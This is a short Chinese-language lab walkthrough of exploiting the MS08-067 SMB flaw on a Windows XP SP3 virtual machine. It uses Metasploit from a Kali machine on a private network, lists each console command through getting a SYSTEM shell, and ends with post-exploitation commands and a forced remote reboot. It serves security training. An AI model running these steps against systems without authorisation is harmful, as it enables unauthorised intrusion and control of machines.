ms08_067对XP进行渗透

攻击机kali2019.1a ip:192.168.1.9

xp靶机Windows XP SP3 Chinese - Simplified (NX)  ip:192.168.1.5

在kali终端中开启

命令:msfconsole

命令:msf5 > search ms08_067

查找ms08_067,ms代表微软，08则代表08年发现的漏洞，067代表当年发现的第67个漏洞

 

使用上面提供name下的名称

命令:use exploit/windows/smb/ms08_067_netapi

设置目标机RHOST

rhost为xp主机ip，我们设置成有ms08_067漏洞的xp系统的ip，用下面的命令进行设置

命令:set rhost 192.168.1.5

查看target

命令:show targets

设置与xp系统相同版本

检查配置信息

命令:show options

开始运行：

命令:exploit

命令:输入shell查看

已经获得xp靶机最高权限

 

解决中文乱码

点击编辑

 

 

 

命令:natstat -an #查看端口信息

显示IP信息

命令：ipconfig

 

重启xp

命令:shutdown -r -f -t 0

总结：

xp系统一定要关闭防火墙与自动更新，终端改过编码使用过后一定要改回UTF-8格式的编码